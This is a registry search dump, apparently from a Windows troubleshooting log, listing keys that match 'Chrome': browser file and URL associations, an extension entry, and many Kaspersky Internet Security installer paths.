========== regfind ==========

Searching for "Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML\DefaultIcon]
@="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome]
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome]
@="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationName"="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationIcon"="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationDescription"="Google Chrome is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Google Chrome."
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".xhtml"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".xht"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".shtml"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".html"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".htm"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".webp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\Startmenu]
"StartMenuInternet"="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"webcal"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"urn"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"tel"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"smsto"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"sms"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"nntp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"news"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"mms"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"mailto"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"irc"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"https"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"http"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"ftp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\DefaultIcon]
@="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ShowIconsCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --show-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"HideIconsCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --hide-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ReinstallCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --make-default-browser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
@=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe""
[HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome]
[HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\blbkdnmdcafmfhinpmnlhhddbepgkeaa]
"path"="https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\chrome.exe]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko15\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko16\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko17\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko18\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko19\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko20\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko21\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko22\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko23\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko24\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\locales\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\locales\en\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com\chrome\locales\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com\chrome\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com\chrome\locales\en\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko15\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko16\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko17\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko18\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko19\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko20\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko21\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko22\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko23\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko24\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\content\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\locales\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\locales\en\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\skin\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko15\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko16\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko17\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko18\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko19\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko20\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko21\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko22\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko23\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko24\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\content\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\locales\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\locales\en\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\skin\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko15\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko16\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko17\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko18\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko19\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko20\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko21\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko22\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko23\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko24\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\content\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\locales\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\locales\en\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\skin\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\03275D968512760549541EDA21C03EFD]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvisor.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0B01BB9E55DC8565BB80E9313E53D9EF]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome_registrar.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D7ECF56F7A874C5D94B98D08B2CFF2A]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com\chrome\locales\en\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\11EAFED5F30246E508782C2AD992DA93]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko20\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1C2EEAFCFE60A095B8E01FE0B6367825]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko24\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\22EEE6BF5D67F9659BCD66B72F6B5B0A]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\25FB3E76BABEDF95697056BAFC399987]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\locales\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2F1935D091D7F93508B95278F73303E0]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko20\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\316B4F46F76609B52AD969773C5C7543]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko17\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\31A453A2BD14A1058A2509E78DCF91CD]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\content\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\32433A8DD11F00053BE75386E5E7BB02]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\locales\en\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\34143E74A7B23AC58A74E7E994E50535]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko15\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\38AD3A8815EBD4959A02C8C388B8E129]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\skin\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3C9F7FBF5899DA552AEC125B840EA3FB]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko24\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3F656233832EB825D8BA12B986929EFC]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko23\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\40D86A454B850EF51929AD4AF99763F5]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvcrxreg.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\42F3BD64C8A79C151BD53F893EED1B81]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko16\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\46F03BCE56E83305399D877C6F7EA537]
